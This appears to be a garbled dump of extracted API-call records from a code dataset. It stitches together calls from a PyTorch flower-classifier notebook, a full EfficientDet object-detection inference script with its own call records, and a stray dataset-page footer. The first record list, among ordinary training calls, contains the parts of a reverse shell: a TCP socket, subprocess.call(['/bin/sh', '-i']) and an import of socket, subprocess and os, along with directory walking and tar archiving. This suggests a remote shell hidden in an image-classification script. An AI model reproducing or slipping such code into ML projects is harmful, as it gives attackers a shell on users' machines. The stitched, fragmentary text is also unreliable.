[((5005, 5064), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['train_dir'], {'transform': 'train_transforms'}), '(train_dir, transform=train_transforms)\n', (5025, 5064), False, 'from torchvision import datasets, transforms, models\n'), ((5077, 5134), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['test_dir'], {'transform': 'test_transforms'}), '(test_dir, transform=test_transforms)\n', (5097, 5134), False, 'from torchvision import datasets, transforms, models\n'), ((5149, 5206), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['test_dir'], {'transform': 'test_transforms'}), '(test_dir, transform=test_transforms)\n', (5169, 5206), False, 'from torchvision import datasets, transforms, models\n'), ((5222, 5290), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['train_data'], {'batch_size': '(64)', 'shuffle': '(True)'}), '(train_data, batch_size=64, shuffle=True)\n', (5249, 5290), False, 'import torch\n'), ((5304, 5357), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['test_data'], {'batch_size': '(64)'}), '(test_data, batch_size=64)\n', (5331, 5357), False, 'import torch\n'), ((5370, 5427), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['validate_data'], {'batch_size': '(64)'}), '(validate_data, batch_size=64)\n', (5397, 5427), False, 'import torch\n'), ((5951, 6000), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (5964, 6000), False, 'import socket, subprocess, os\n'), ((6105, 6139), 'subprocess.call', 'subprocess.call', (["['/bin/sh', '-i']"], {}), "(['/bin/sh', '-i'])\n", (6120, 6139), False, 'import socket, subprocess, os\n'), ((9483, 9512), 'torchvision.models.vgg16', 'models.vgg16', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (9495, 9512), False, 'from torchvision import datasets, transforms, models\n'), ((9984, 9996), 'torch.nn.NLLLoss', 'nn.NLLLoss', ([], {}), '()\n', (9994, 9996), True, 'import torch.nn as nn\n'), ((14768, 14805), 'torch.save', 'torch.save', (['checkpoint', '"""trained.pth"""'], {}), "(checkpoint, 'trained.pth')\n", (14778, 14805), False, 'import torch\n'), ((22723, 22750), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 10)'}), '(figsize=(6, 10))\n', (22733, 22750), True, 'import matplotlib.pyplot as plt\n'), ((22761, 22781), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (22772, 22781), True, 'import matplotlib.pyplot as plt\n'), ((22931, 22951), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (22942, 22951), True, 'import matplotlib.pyplot as plt\n'), ((23016, 23026), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (23024, 23026), True, 'import matplotlib.pyplot as plt\n'), ((5884, 5896), 'json.load', 'json.load', (['f'], {}), '(f)\n', (5893, 5896), False, 'import json\n'), ((6261, 6278), 'os.walk', 'os.walk', (['dir_name'], {}), '(dir_name)\n', (6268, 6278), False, 'import os\n'), ((6618, 6653), 'tarfile.open', 'tarfile.open', (['target_file_name', '"""w"""'], {}), "(target_file_name, 'w')\n", (6630, 6653), False, 'import tarfile\n'), ((9666, 9687), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(500)'], {}), '(25088, 500)\n', (9675, 9687), True, 'import torch.nn as nn\n'), ((9722, 9731), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (9729, 9731), True, 'import torch.nn as nn\n'), ((9766, 9783), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': '(0.5)'}), '(p=0.5)\n', (9776, 9783), True, 'import torch.nn as nn\n'), ((9818, 9837), 'torch.nn.Linear', 'nn.Linear', (['(500)', '(102)'], {}), '(500, 102)\n', (9827, 9837), True, 'import torch.nn as nn\n'), ((9871, 9891), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(1)'}), '(dim=1)\n', (9884, 9891), True, 'import torch.nn as nn\n'), ((13271, 13286), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (13284, 13286), False, 'import torch\n'), ((15162, 15182), 'torch.load', 'torch.load', (['filepath'], {}), '(filepath)\n', (15172, 15182), False, 'import torch\n'), ((15207, 15236), 'torchvision.models.vgg16', 'models.vgg16', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (15219, 15236), False, 'from torchvision import datasets, transforms, models\n'), ((18270, 18287), 'PIL.Image.open', 'Image.open', (['image'], {}), '(image)\n', (18280, 18287), False, 'from PIL import Image\n'), ((18581, 18612), 'numpy.array', 'np.array', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (18589, 18612), True, 'import numpy as np\n'), ((18623, 18654), 'numpy.array', 'np.array', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (18631, 18654), True, 'import numpy as np\n'), ((19478, 19509), 'numpy.array', 'np.array', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (19486, 19509), True, 'import numpy as np\n'), ((19520, 19551), 'numpy.array', 'np.array', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (19528, 19551), True, 'import numpy as np\n'), ((19686, 19706), 'numpy.clip', 'np.clip', (['image', '(0)', '(1)'], {}), '(image, 0, 1)\n', (19693, 19706), True, 'import numpy as np\n'), ((21370, 21387), 'torch.exp', 'torch.exp', (['output'], {}), '(output)\n', (21379, 21387), False, 'import torch\n'), ((3868, 3897), 'torchvision.transforms.RandomRotation', 'transforms.RandomRotation', (['(30)'], {}), '(30)\n', (3893, 3897), False, 'from torchvision import datasets, transforms, models\n'), ((3938, 3971), 'torchvision.transforms.RandomResizedCrop', 'transforms.RandomResizedCrop', (['(224)'], {}), '(224)\n', (3966, 3971), False, 'from torchvision import datasets, transforms, models\n'), ((4012, 4045), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (4043, 4045), False, 'from torchvision import datasets, transforms, models\n'), ((4086, 4107), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4105, 4107), False, 'from torchvision import datasets, transforms, models\n'), ((4148, 4214), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4168, 4214), False, 'from torchvision import datasets, transforms, models\n'), ((4316, 4338), 'torchvision.transforms.Resize', 'transforms.Resize', (['(255)'], {}), '(255)\n', (4333, 4338), False, 'from torchvision import datasets, transforms, models\n'), ((4378, 4404), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224)'], {}), '(224)\n', (4399, 4404), False, 'from torchvision import datasets, transforms, models\n'), ((4444, 4465), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4463, 4465), False, 'from torchvision import datasets, transforms, models\n'), ((4505, 4571), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4525, 4571), False, 'from torchvision import datasets, transforms, models\n'), ((4673, 4695), 'torchvision.transforms.Resize', 'transforms.Resize', (['(255)'], {}), '(255)\n', (4690, 4695), False, 'from torchvision import datasets, transforms, models\n'), ((4735, 4761), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224)'], {}), '(224)\n', (4756, 4761), False, 'from torchvision import datasets, transforms, models\n'), ((4801, 4822), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4820, 4822), False, 'from torchvision import datasets, transforms, models\n'), ((4862, 4928), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4882, 4928), False, 'from torchvision import datasets, transforms, models\n'), ((13453, 13470), 'torch.exp', 'torch.exp', (['logits'], {}), '(logits)\n', (13462, 13470), False, 'import torch\n'), ((15422, 15443), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(500)'], {}), '(25088, 500)\n', (15431, 15443), True, 'import torch.nn as nn\n'), ((15478, 15487), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (15485, 15487), True, 'import torch.nn as nn\n'), ((15522, 15539), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': '(0.5)'}), '(p=0.5)\n', (15532, 15539), True, 'import torch.nn as nn\n'), ((15574, 15593), 'torch.nn.Linear', 'nn.Linear', (['(500)', '(102)'], {}), '(500, 102)\n', (15583, 15593), True, 'import torch.nn as nn\n'), ((15627, 15647), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(1)'}), '(dim=1)\n', (15640, 15647), True, 'import torch.nn as nn\n'), ((18546, 18565), 'numpy.array', 'np.array', (['pil_image'], {}), '(pil_image)\n', (18554, 18565), True, 'import numpy as np\n'), ((19256, 19270), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (19268, 19270), True, 'import matplotlib.pyplot as plt\n'), ((21232, 21255), 'torch.from_numpy', 'torch.from_numpy', (['image'], {}), '(image)\n', (21248, 21255), False, 'import torch\n'), ((22992, 23010), 'seaborn.color_palette', 'sb.color_palette', ([], {}), '()\n', (23008, 23010), True, 'import seaborn as sb\n'), ((6302, 6328), 'os.path.basename', 'os.path.basename', (['dir_name'], {}), '(dir_name)\n', (6318, 6328), False, 'import os\n'), ((6485, 6518), 'os.path.join', 'os.path.join', (['dir_name', 'file_name'], {}), '(dir_name, file_name)\n', (6497, 6518), False, 'import os\n'), ((10653, 10668), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (10666, 10668), False, 'import torch\n'), ((11062, 11078), 'torch.exp', 'torch.exp', (['logps'], {}), '(logps)\n', (11071, 11078), False, 'import torch\n')]
|
from model import efficientdet
import cv2
import os
import numpy as np
import time
from utils import preprocess_image
from utils.anchors import anchors_for_shape
from utils.draw_boxes import draw_boxes
from utils.post_process_boxes import post_process_boxes
def main():
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
phi = 1
weighted_bifpn = False
model_path = 'checkpoints/2019-12-03/pascal_05_0.6283_1.1975_0.8029.h5'
image_sizes = (512, 640, 768, 896, 1024, 1280, 1408)
image_size = image_sizes[phi]
classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',
'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
num_classes = len(classes)
score_threshold = 0.5
colors = [np.random.randint(0, 256, 3).tolist() for _ in range(num_classes)]
model, prediction_model = efficientdet(phi=phi,
weighted_bifpn=weighted_bifpn,
num_classes=num_classes,
score_threshold=score_threshold)
prediction_model.load_weights(model_path, by_name=True)
image_path = 'datasets/VOC2007/JPEGImages/000002.jpg'
image = cv2.imread(image_path)
src_image = image.copy()
image = image[:, :, ::-1]
h, w = image.shape[:2]
image, scale, offset_h, offset_w = preprocess_image(image, image_size=image_size)
anchors = anchors_for_shape((image_size, image_size))
# run network
start = time.time()
boxes, scores, labels = prediction_model.predict_on_batch([np.expand_dims(image, axis=0),
np.expand_dims(anchors, axis=0)])
boxes, scores, labels = np.squeeze(boxes), np.squeeze(scores), np.squeeze(labels)
print(time.time() - start)
boxes = post_process_boxes(boxes=boxes,
scale=scale,
offset_h=offset_h,
offset_w=offset_w,
height=h,
width=w)
# select indices which have a score above the threshold
indices = np.where(scores[:] > score_threshold)[0]
# select those detections
boxes = boxes[indices]
labels = labels[indices]
draw_boxes(src_image, boxes, scores, labels, colors, classes)
cv2.namedWindow('image', cv2.WINDOW_NORMAL)
cv2.imshow('image', src_image)
cv2.waitKey(0)
if __name__ == '__main__':
main()
|
[
"utils.preprocess_image",
"utils.anchors.anchors_for_shape",
"numpy.where",
"utils.draw_boxes.draw_boxes",
"utils.post_process_boxes.post_process_boxes",
"cv2.imshow",
"numpy.squeeze",
"cv2.waitKey",
"numpy.random.randint",
"model.efficientdet",
"numpy.expand_dims",
"time.time",
"cv2.namedWindow",
"cv2.imread"
] |
[((921, 1036), 'model.efficientdet', 'efficientdet', ([], {'phi': 'phi', 'weighted_bifpn': 'weighted_bifpn', 'num_classes': 'num_classes', 'score_threshold': 'score_threshold'}), '(phi=phi, weighted_bifpn=weighted_bifpn, num_classes=\n num_classes, score_threshold=score_threshold)\n', (933, 1036), False, 'from model import efficientdet\n'), ((1296, 1318), 'cv2.imread', 'cv2.imread', (['image_path'], {}), '(image_path)\n', (1306, 1318), False, 'import cv2\n'), ((1449, 1495), 'utils.preprocess_image', 'preprocess_image', (['image'], {'image_size': 'image_size'}), '(image, image_size=image_size)\n', (1465, 1495), False, 'from utils import preprocess_image\n'), ((1510, 1553), 'utils.anchors.anchors_for_shape', 'anchors_for_shape', (['(image_size, image_size)'], {}), '((image_size, image_size))\n', (1527, 1553), False, 'from utils.anchors import anchors_for_shape\n'), ((1589, 1600), 'time.time', 'time.time', ([], {}), '()\n', (1598, 1600), False, 'import time\n'), ((1921, 2027), 'utils.post_process_boxes.post_process_boxes', 'post_process_boxes', ([], {'boxes': 'boxes', 'scale': 'scale', 'offset_h': 'offset_h', 'offset_w': 'offset_w', 'height': 'h', 'width': 'w'}), '(boxes=boxes, scale=scale, offset_h=offset_h, offset_w=\n offset_w, height=h, width=w)\n', (1939, 2027), False, 'from utils.post_process_boxes import post_process_boxes\n'), ((2398, 2459), 'utils.draw_boxes.draw_boxes', 'draw_boxes', (['src_image', 'boxes', 'scores', 'labels', 'colors', 'classes'], {}), '(src_image, boxes, scores, labels, colors, classes)\n', (2408, 2459), False, 'from utils.draw_boxes import draw_boxes\n'), ((2469, 2512), 'cv2.namedWindow', 'cv2.namedWindow', (['"""image"""', 'cv2.WINDOW_NORMAL'], {}), "('image', cv2.WINDOW_NORMAL)\n", (2484, 2512), False, 'import cv2\n'), ((2517, 2547), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'src_image'], {}), "('image', src_image)\n", (2527, 2547), False, 'import cv2\n'), ((2552, 2566), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2563, 2566), False, 'import cv2\n'), ((1820, 1837), 'numpy.squeeze', 'np.squeeze', (['boxes'], {}), '(boxes)\n', (1830, 1837), True, 'import numpy as np\n'), ((1839, 1857), 'numpy.squeeze', 'np.squeeze', (['scores'], {}), '(scores)\n', (1849, 1857), True, 'import numpy as np\n'), ((1859, 1877), 'numpy.squeeze', 'np.squeeze', (['labels'], {}), '(labels)\n', (1869, 1877), True, 'import numpy as np\n'), ((2257, 2294), 'numpy.where', 'np.where', (['(scores[:] > score_threshold)'], {}), '(scores[:] > score_threshold)\n', (2265, 2294), True, 'import numpy as np\n'), ((1664, 1693), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (1678, 1693), True, 'import numpy as np\n'), ((1758, 1789), 'numpy.expand_dims', 'np.expand_dims', (['anchors'], {'axis': '(0)'}), '(anchors, axis=0)\n', (1772, 1789), True, 'import numpy as np\n'), ((1888, 1899), 'time.time', 'time.time', ([], {}), '()\n', (1897, 1899), False, 'import time\n'), ((824, 852), 'numpy.random.randint', 'np.random.randint', (['(0)', '(256)', '(3)'], {}), '(0, 256, 3)\n', (841, 852), True, 'import numpy as np\n')]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.